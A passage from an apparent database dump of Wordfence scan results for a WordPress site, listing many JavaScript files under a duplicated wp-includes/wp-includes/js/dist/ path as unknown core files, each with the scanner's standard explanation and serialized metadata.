More</a>','a:5:{s:4:\"file\";s:40:\"wp-includes/wp-includes/js/dist/hooks.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34157,1631564695,1631564695,'new','knownfile',75,'68e25ef6023bbca1a93470bc44e81e18','5006dc9e2ac421e5efaf20a7f20d1b70','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/hooks.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/js/dist/hooks.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34158,1631564695,1631564695,'new','knownfile',75,'15d198638ab13c648b87ff21988c17ee','19c492e92491ad09375407fa54435814','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/html-entities.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/dist/html-entities.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34159,1631564695,1631564695,'new','knownfile',75,'7140fd5ed0885985866e35e4f78ead8e','b3c5acef3e97d7ff0f2c2955a0fd8cff','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/html-entities.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/js/dist/html-entities.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34160,1631564695,1631564695,'new','knownfile',75,'abd7132e0c28c01894c4c67ca1edc1a9','0990d368c5b8444552e276f4cc8e684b','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/i18n.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:39:\"wp-includes/wp-includes/js/dist/i18n.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34161,1631564695,1631564695,'new','knownfile',75,'0f5342a406a60a77284d33860fed4e22','ff20822a5ab7d1ba9c872269e8994fd8','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/i18n.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/js/dist/i18n.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34162,1631564695,1631564695,'new','knownfile',75,'947009cd44d1aefbf324f822e83bbcfc','1ff4a31ca218935f4d2d1900a61f2707','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/is-shallow-equal.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/dist/is-shallow-equal.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34163,1631564695,1631564695,'new','knownfile',75,'5e21509d1417833c33fab48d4e0e8652','7fca0aaf45d9db4c7b6c7f74f0356596','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/is-shallow-equal.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/js/dist/is-shallow-equal.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34164,1631564695,1631564695,'new','knownfile',75,'eebf7e1f7faa8281dc343d5ad9c90818','b0ecd16e73001044deeab0b53367863c','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/keyboard-shortcuts.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/js/dist/keyboard-shortcuts.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34165,1631564695,1631564695,'new','knownfile',75,'2059f465c84b0268289ab4a9a6ecd775','9d7c49060fc39b36860638248fe8627b','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/keyboard-shortcuts.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/js/dist/keyboard-shortcuts.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34166,1631564695,1631564695,'new','knownfile',75,'64e5c0dec8dd9f7530f3ca321dfb3d07','cdbb24f6bac58cdb3c758b3cd971bc9f','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/keycodes.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/js/dist/keycodes.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34167,1631564695,1631564695,'new','knownfile',75,'aab956ef67359794322931a6261c55f9','8ce46aead738c5835936db0384d6c0cb','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/keycodes.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/js/dist/keycodes.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34168,1631564695,1631564695,'new','knownfile',75,'9c92ec3aedb7eac86a74536e0083f1f7','de9bfecd6139d79abac14944ab1cee40','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/list-reusable-blocks.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/js/dist/list-reusable-blocks.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34169,1631564695,1631564695,'new','knownfile',75,'fd662f90b4a96b65b1b7a8ccc7f83dde','2d733c73787d4d294123ac5690ccfcfb','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/list-reusable-blocks.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/js/dist/list-reusable-blocks.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34170,1631564695,1631564695,'new','knownfile',75,'de92c1df4f71cc86ad47d46738d69d2f','2836720a7835b6759727c4c15a39e779','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/media-utils.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/dist/media-utils.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34171,1631564695,1631564695,'new','knownfile',75,'f932d202aba4273528721a59f9058347','59696e54b1ac16874250d06ddcf11673','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/media-utils.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/dist/media-utils.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34172,1631564695,1631564695,'new','knownfile',75,'d2ee274fa7bad3b499601542788caa9f','4874470551b723f2cea8b5268e925975','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/notices.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/dist/notices.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34173,1631564695,1631564695,'new','knownfile',75,'c61ea5bd4cea7d743960fa42dc5bdca8','f8ef6d4e869ea4bf9fb16b719ae9a200','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/notices.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/dist/notices.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34174,1631564695,1631564695,'new','knownfile',75,'1daa14257dd08f2c6832282c3ec35d97','fd6c253b0979c5db1aa7923ae3b3c653','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/nux.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/js/dist/nux.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34175,1631564695,1631564695,'new','knownfile',75,'9ff9ff5e0d668524b35f3ac2f0fc8152','7034447f82fe8adb327d9a76bf63f695','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/nux.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/dist/nux.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34176,1631564695,1631564695,'new','knownfile',75,'3a2eb4e8a7642ae7d7dd45d6763792ac','44793fb1c5ee99dd95f74867db06bd8d','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/plugins.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/dist/plugins.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34177,1631564695,1631564695,'new','knownfile',75,'82a351ed761abd7d2cd1512baa5f5aef','1043f5eee4e0d0806389ac13604b1136','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/plugins.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/dist/plugins.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34178,1631564695,1631564695,'new','knownfile',75,'d65595d2ad50f9ba0f78cc20da410d6e','d9c9f0395c3f10dc505eb2692036e860','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/primitives.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/js/dist/primitives.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34179,1631564695,1631564695,'new','knownfile',75,'6ca2308769a3361be368a697773d3b14','9dd9bd9b16e14df40b857b72913976be','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/primitives.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/js/dist/primitives.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34180,1631564695,1631564695,'new','knownfile',75,'30ed3203f79a70192baadfa88681d6b0','c2bb6e960abadf0d24785b8542b45633','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/priority-queue.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/js/dist/priority-queue.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34181,1631564695,1631564695,'new','knownfile',75,'6be93f906364470ff9bbd0c872d76ac1','35c2aa9cf44f0ed2bf55fd1f84400c5c','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/priority-queue.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/js/dist/priority-queue.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34182,1631564695,1631564695,'new','knownfile',75,'a725f99ecefd222b39c2ebb35609560d','86a82d47263771b99e75b129af3b76b0','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/redux-routine.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/dist/redux-routine.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34183,1631564695,1631564695,'new','knownfile',75,'ea3fdaaadcfed56639be293fcf79a6bb','531b9537f43617ee23a51a05e6f58bae','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/redux-routine.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/js/dist/redux-routine.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34184,1631564695,1631564695,'new','knownfile',75,'b9f864d97fabf238ca53a5a1eb68db21','a0b46206d2527640fa4d348fbf791b57','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/reusable-blocks.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/dist/reusable-blocks.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34185,1631564695,1631564695,'new','knownfile',75,'94d3fa5682b87747da8b7b1113cf87f6','aba8412861c2fa1e9e53dd6f5f45e13c','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/reusable-blocks.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/js/dist/reusable-blocks.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34186,1631564695,1631564695,'new','knownfile',75,'ecfa77a69858f2fffd35a8d2ca436333','f118670be968714762d073857d01e949','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/rich-text.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/js/dist/rich-text.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34187,1631564695,1631564695,'new','knownfile',75,'c56953c66c8a194aa0a0fc533af73977','e5d98b82e12377fbe45e10539a09bbdc','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/rich-text.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/dist/rich-text.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34188,1631564695,1631564695,'new','knownfile',75,'1f80a3683c70a74c9907a7918fde463b','d8d834c4031ba8dc4df6a8f1d13b296b','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/server-side-render.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/js/dist/server-side-render.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34189,1631564695,1631564695,'new','knownfile',75,'8bc2b0773ab72469062ab7ebfb7462d7','1228aa1dccb58cbc7d548267e51998aa','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/server-side-render.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/js/dist/server-side-render.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34190,1631564695,1631564695,'new','knownfile',75,'1747900cc6d163269e6a4a9eb489f2f1','466c2e7753d478ae2e85b0b40c661a73','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/shortcode.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/js/dist/shortcode.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34191,1631564696,1631564696,'new','knownfile',75,'4d1bb52d928262a8d807a850caa8252d','428961b0823b9d8d192284e060486cef','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/shortcode.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/dist/shortcode.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34192,1631564696,1631564696,'new','knownfile',75,'acf888dd1af6ab0c5a169068757ca2b0','f3b65b7e1801b90f9a7f190354d9d932','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/token-list.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/js/dist/token-list.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34193,1631564696,1631564696,'new','knownfile',75,'88df3943b02c89fd653d6c721d1ae0b6','f625b99eee97c438585285297a02adef','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/token-list.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/js/dist/token-list.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34194,1631564696,1631564696,'new','knownfile',75,'98c24d7543e1a6ee5fbcec58a3b314af','0a5631e8ddaeda277829e806856f60fc','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/url.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/js/dist/url.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34195,1631564696,1631564696,'new','knownfile',75,'820dd9beb3ade887ca3632ad0afe21ab','c1b43dc2cba8be83c4f9d88a3def065a','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/url.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/dist/url.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34196,1631564696,1631564696,'new','knownfile',75,'accb24144ca9068ce008f7c20458558f','5c87f772944e9997641d4aefe546fdb3','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/lodash.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn 